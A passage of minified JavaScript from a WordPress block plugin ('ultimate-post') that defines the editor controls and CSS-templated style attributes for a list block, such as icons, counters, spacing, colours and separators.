Typography","ultimate-post")}},{position:7,data:{type:"range",key:"listGroupSubtextSpace",unit:!0,responsive:!0,label:__("Space Between  Text & Subtext","ultimate-post")}},{position:8,data:{type:"color",key:"listGroupSubtextColor",label:__("Subtext Color","ultimate-post")}},{position:9,data:{type:"color",key:"listGroupSubtextHoverColor",label:__("Subtext Hover Color","ultimate-post")}},{position:10,data:{type:"toggle",key:"listGroupBelowIcon",help:"Layout One/Two Required ",label:__("Midpoint Subtext","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content Wrap","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"listGroupPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"listGroupBg",label:__("Background Color","ultimate-post")},{type:"border",key:"listGroupborder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"listGroupHoverBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listGroupHovborder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupHovRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Separator","ultimate-post"),depend:"enableSeparator",include:[{position:1,data:{type:"color",key:"listGroupSepColor",label:__("Border Color","ultimate-post")}},{position:2,data:{type:"range",key:"listGroupSepSize",min:0,max:30,label:__("Separator Size","ultimate-post")}},{position:3,data:{type:"select",key:"listGroupSepStyle",options:[{value:"none",label:__("None","ultimate-post")},{value:"dotted",label:__("Dotted","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")},{value:"dashed",label:__("Dashed","ultimate-post")},{value:"groove",label:__("Groove","ultimate-post")}],label:__("Border Style","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())},65839:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1",style:[{depends:[{key:"layout",condition:"==",value:"layout1"}]},{depends:[{key:"layout",condition:"==",value:"layout2"}]},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} li .ultp-list-content { display: block !important; }"},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}]}]},listLayout:{type:"string",default:"number",style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}  ul,\n                {{ULTP}}  ul li { list-style-type: none; }"},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"listLayout",condition:"==",value:"roman"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: roman-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: roman-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon:before { content: counter(roman-counter, upper-roman) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"listLayout",condition:"==",value:"number"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: number-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: number-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon:before { content: counter(number-counter) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box; }'},{depends:[{key:"listLayout",condition:"==",value:"abc"},{key:"listGroupIconType",condition:"==",value:"default"},{key:"listGroupBelowIcon",condition:"==",value:!1}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon:before { content: counter(alpha-counter, lower-alpha) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"},{key:"listGroupBelowIcon",condition:"==",value:!1}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative;  }\n                {{ULTP}} .ultp-list-texticon { line-height: 0px; }\n                {{ULTP}} .ultp-list-texticon:before {   content: ""; display: inline-block; width: 10px; height: 10px; border-radius: 50%; background-color: black; transition: .3s; box-sizing: border-box; }'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"roman"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: roman-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: roman-counter; }\n                {{ULTP}} .ultp-list-texticon:before { content: counter(roman-counter, upper-roman) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"number"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: number-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: number-counter; }\n                {{ULTP}} .ultp-list-texticon:before { content: counter(number-counter) "."; display: flex; align-items: center;  justify-content: center; transition: .3s; box-sizing: border-box;}'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"abc"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center;  position: relative; counter-increment: alpha-counter; }\n                {{ULTP}} .ultp-list-texticon:before { content: counter(alpha-counter, lower-alpha) "."; display: flex; align-items: center; justify-content: center; transition: .3s; box-sizing: border-box; }'},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:'{{ULTP}} .ultp-list-wrapper { counter-reset: alpha-counter; }\n                {{ULTP}} .wp-block-ultimate-post-list { display: flex; align-items: center; position: relative; counter-increment: alpha-counter; }\n                {{ULTP}} .ultp-list-texticon { line-height: 0px; }\n                {{ULTP}} .ultp-list-texticon:before {   content: ""; display: inline-block; width: 10px; height: 10px; border-radius: 50%; background-color: black; transition: .3s; box-sizing: border-box; }'}]},listInline:{type:"boolean",default:!1,style:[{depends:[{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: flex;}\n            {{ULTP}} .ultp-list-wrapper > li:last-child { padding-right: 0px; margin-right: 0px; }\n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list { width: auto !important; }"},{depends:[{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: block;} \n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list { width: 100%; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: flex;}\n            {{ULTP}} .block-editor-block-list__layout>div:last-child li{ padding-right: 0px; margin-right: 0px;} \n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list { width: auto !important; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list) { display: block;} \n            {{ULTP}} .block-editor-block-list__layout > div,\n            {{ULTP}} .wp-block-ultimate-post-list{ width: 100%; }"}]},listAlignment:{type:"string",default:"left",style:[{depends:[{key:"listAlignment",condition:"==",value:"left"},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; flex-direction: column; align-items: flex-start;}"},{depends:[{key:"listAlignment",condition:"==",value:"right"},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left: auto; display: flex; flex-direction: column; align-items: flex-end;}"},{depends:[{key:"listInline",condition:"==",value:!1},{key:"listAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-direction: column; align-items: center;}"},{depends:[{key:"listInline",condition:"==",value:!0},{key:"listAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-wrap: wrap; justify-content: center;}\n                {{ULTP}} .ultp-list-wrapper .ultp-list-content { justify-content: center; }"},{depends:[{key:"listAlignment",condition:"==",value:"left"},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; justify-content: flex-start; flex-wrap: wrap;}"},{depends:[{key:"listAlignment",condition:"==",value:"right"},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list ),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left:  auto; display: flex; justify-content: flex-end; flex-wrap: wrap;}"}]},listSpaceBetween:{type:"object",default:{lg:"17",unit:"px"},style:[{depends:[{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-list { margin-right:calc({{listSpaceBetween}}/ 2); padding-right:calc({{listSpaceBetween}}/ 2);}\n                {{ULTP}} .wp-block-ultimate-post-list{ margin-top: 0px !important; margin-bottom: 0px !important;}"},{depends:[{key:"listInline",condition:"==",value:!0},{key:"enableSeparator",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-list-wrapper:has( > .wp-block-ultimate-post-list),\n                {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { gap:{{listSpaceBetween}}; }\n                {{ULTP}} .wp-block-ultimate-post-list{ margin: 0px !important; }"},{depends:[{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} .wp-block-ultimate-post-list { margin-bottom: calc({{listSpaceBetween}}/ 2); padding-bottom:calc({{listSpaceBetween}}/ 2);}"}]},listSpaceIconText:{type:"object",default:{lg:"12",ulg:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupBelowIcon",condition:"==",value:!1}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { column-gap:{{listSpaceIconText}}; }"},{depends:[{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupBelowIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-heading { column-gap:{{listSpaceIconText}}; }"},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg,\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { margin-bottom:{{listSpaceIconText}}; }"}]},enableIcon:{type:"boolean",default:!0},listPosition:{type:"string",default:"center",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { align-items:{{listPosition}}; }"}]},listGroupIconType:{type:"string",default:"icon",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}]}]},listCustomIcon:{type:"string",default:"right_circle_line",style:[{depends:[{key:"listGroupIconType",condition:"==",value:"icon"}]}]},listGroupCustomImg:{type:"object",default:"",style:[{depends:[{key:"enableIcon",condition:"==",value:!0},{key:"listGroupIconType",condition:"==",value:"image"}]}]},listImgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"image"}],selector:"{{ULTP}} .wp-block-ultimate-post-list img { border-radius: {{listImgRadius}}; }"}]},listGroupIconSize:{type:"string",default:"16",style:[{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list svg,\n                {{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg img { height:{{listGroupIconSize}}px; width:{{listGroupIconSize}}px; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"}],selector:"{{ULTP}} .ultp-list-texticon:before { height:{{listGroupIconSize}}px; width:{{listGroupIconSize}}px; }"}]},listIconTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before "}]},listGroupBgSize:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before { height:{{listGroupBgSize}}px; width:{{listGroupBgSize}}px; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { height:{{listGroupBgSize}}px; width:{{listGroupBgSize}}px; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg { height:{{listGroupBgSize}}px; width:{{listGroupBgSize}}px; min-width:{{listGroupBgSize}}px; }"}]},listGroupIconColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"},{key:"listLayout",condition:"!=",value:"bullet"}],selector:"{{ULTP}} .ultp-list-texticon:before { color:{{listGroupIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"==",value:"default"},{key:"listLayout",condition:"==",value:"bullet"}],selector:"{{ULTP}} .ultp-list-texticon:before { background-color:{{listGroupIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listGroupIconType",condition:"!=",value:"image"}],selector:"{{ULTP}} .ultp-listicon-bg svg { color:{{listGroupIconColor}};}"}]},listGroupIconbg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before { background: {{listGroupIconbg}};}"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { background: {{listGroupIconbg}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg { background: {{listGroupIconbg}};}"}]},listGroupIconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg"}]},listGroupIconRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before { border-radius: {{listGroupIconRadius}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { border-radius: {{listGroupIconRadius}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg { border-radius: {{listGroupIconRadius}}; }"}]},listGroupHoverIconColor:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { color:{{listGroupHoverIconColor}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { background-color:{{listGroupHoverIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listGroupIconType",condition:"!=",value:"image"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg svg { color:{{listGroupHoverIconColor}};}"}]},listGroupHoverIconbg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .block-editor-block-list__block:hover .wp-block-ultimate-post-list .ultp-list-texticon:before ,\n                {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { background: {{listGroupHoverIconbg}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon { background: {{listGroupHoverIconbg}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg { background: {{listGroupHoverIconbg}}; }"}]},listGroupHoverIconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .block-editor-block-list__block:hover .wp-block-ultimate-post-list .ultp-list-texticon:before, \n                {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-texticon:before "},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg"}]},listGroupHoverIconRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .block-editor-block-list__block:hover .wp-block-ultimate-post-list .ultp-list-texticon:before , \n                {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { border-radius: {{listGroupHoverIconRadius}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon { border-radius: {{listGroupHoverIconRadius}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg { border-radius: {{listGroupHoverIconRadius}}; }"}]},listDisableText:{type:"boolean",default:!1,style:[{depends:[{key:"listDisableText",condition:"==",value:!1}]},{depends:[{key:"listDisableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-content { display: block !important; }"}]},listTextTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",family:"",weight:400},style:[{selector:"{{ULTP}}  .ultp-list-title,\n            {{ULTP}}  .ultp-list-title a"}]},listGroupTitleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-list-title,\n            {{ULTP}} .ultp-list-title a { color: {{listGroupTitleColor}}; }"}]},listGroupTitleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-title,\n            {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-title a,\n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-list .ultp-list-title,\n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-list .ultp-list-title a { color: {{listGroupTitleHoverColor}}; }"}]},listGroupSubtextEnable:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"layout1"}],selector:'{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: grid; grid-template-areas: "a b" "a c"; align-items: center; }'},{depends:[{key:"layout",condition:"==",value:"layout2"}],selector:'{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: grid; grid-template-areas: "b a" "c a"; align-items: center; justify-content: flex-end; }'},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: block !important; }"}]},listGroupSubtextTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-subtext"}]},listGroupSubtextSpace:{type:"object",default:{lg:"5",ulg:"px"},style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-list-subtext { margin-top:{{listGroupSubtextSpace}}; }"},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout3"}],selector:"{{ULTP}} .ultp-list-subtext { margin-top:{{listGroupSubtextSpace}}; }"},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-content { row-gap:{{listGroupSubtextSpace}}; }\n                {{ULTP}} .ultp-list-title,\n                {{ULTP}} .ultp-list-content a { align-self: self-end; }\n                {{ULTP}} .ultp-list-subtext { align-self: self-start; }"}]},listGroupSubtextColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-subtext { color:{{listGroupSubtextColor}}; }"}]},listGroupSubtextHoverColor:{type:"string",default:"",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-subtext, \n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-list .ultp-list-subtext  { color:{{listGroupSubtextHoverColor}}; }"}]},listGroupBelowIcon:{type:"boolean",default:!1,style:[{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: block !important; }"},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: block !important; }"},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"layout",condition:"!=",value:"layout3"}]}]},listGroupBg:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"}]},listGroupborder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"}]},listGroupRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { border-radius: {{listGroupRadius}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { border-radius: {{listGroupRadius}};}"}]},listGroupPadding:{type:"object",default:{lg:{top:"2",bottom:"2",left:"6",right:"6",unit:"px"}},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list  .ultp-list-content { padding: {{listGroupPadding}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { padding: {{listGroupPadding}}; }"}]},listGroupHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"}]},listGroupHovborder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"}]},listGroupHovRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover { border-radius: {{listGroupHovRadius}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover { border-radius: {{listGroupHovRadius}};}"}]},enableSeparator:{type:"boolean",default:!1},listGroupSepColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul li { border-color: {{listGroupSepColor}}; }"}]},listGroupSepSize:{type:"string",default:"",style:[{depends:[{key:"listInline",condition:"==",value:!0},{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul  li { border-right-width: {{listGroupSepSize}}px; }"},{depends:[{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} ul  li { border-bottom-width: {{listGroupSepSize}}px; }"}]},listGroupSepStyle:{type:"string",default:"solid",style:[{depends:[{key:"listInline",condition:"==",value:!0},{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul li { border-right-style: {{listGroupSepStyle}}; }"},{depends:[{key:"listInline",condition:"==",value:!1},{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul li { border-bottom-style: {{listGroupSepStyle}}; }"}]},wrapBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks 